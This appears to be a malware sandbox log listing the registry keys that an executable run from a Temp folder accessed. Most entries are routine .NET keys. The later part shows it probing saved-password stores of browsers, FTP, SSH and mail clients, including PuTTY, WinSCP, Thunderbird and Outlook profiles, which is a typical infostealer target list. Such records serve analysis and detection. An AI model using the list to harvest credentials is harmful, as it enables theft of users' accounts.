HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\79f5ea3c\6be785ff HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7249b1d2\456a5c99 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|98765123.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|98765123.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|98765123.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7249b1d2\48a4ff61 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox HKEY_CURRENT_USER\Software\LinasFTP\Site Manager HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings HKEY_CURRENT_USER\Software\Ghisler\Total Commander HKEY_CURRENT_USER\Software HKEY_CURRENT_USER\Software\Adobe HKEY_CURRENT_USER\Software\AppDataLow HKEY_CURRENT_USER\Software\JavaSoft HKEY_CURRENT_USER\Software\Macromedia HKEY_CURRENT_USER\Software\Microsoft HKEY_CURRENT_USER\Software\Netscape HKEY_CURRENT_USER\Software\ODBC HKEY_CURRENT_USER\Software\Policies HKEY_CURRENT_USER\Software\Wow6432Node HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Bitvise\BvSshClient HKEY_CURRENT_USER\Software\VanDyke\SecureFX HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird HKEY_CURRENT_USER\Software\IncrediMail\Identities HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities HKEY_CURRENT_USER\Software\Martin Prikryl HKEY_LOCAL_MACHINE\Software\Martin Prikryl HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail HKEY_CURRENT_USER\Software\WinChips\UserAccounts HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging 